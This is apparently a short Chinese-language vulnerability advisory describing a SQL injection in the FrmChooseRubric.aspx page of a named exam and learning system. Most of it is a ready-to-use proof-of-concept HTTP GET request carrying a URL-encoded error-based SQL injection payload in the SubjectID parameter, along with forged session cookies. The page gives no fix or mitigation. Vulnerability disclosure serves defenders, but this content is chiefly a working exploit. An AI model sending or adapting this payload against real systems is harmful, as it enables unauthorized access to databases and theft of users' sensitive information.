考试学习系统 FrmChooseRubric.aspx SQL注入

日期: 2025-08-20 | 影响软件: 考试学习系统 | POC: 已公开

漏洞描述

考试学习系统 FrmChooseRubric.aspx 存在SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。

PoC代码

GET /WorkExam/FrmChooseRubric.aspx?Num=-1&RubricID=-1&SubjectID=%27%29%20AND%202075%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%282075%3D2075%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29--%20gmIb HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: ExamUserCode=1; ExamUserName=1; ExamDeptName=1; ExamDeptID=1;  ExamUserLevel=1;
User-Agent: Opera/9.30.(Windows NT 5.01; th-TH) Presto/2.9.174 Version/10.00

相关漏洞推荐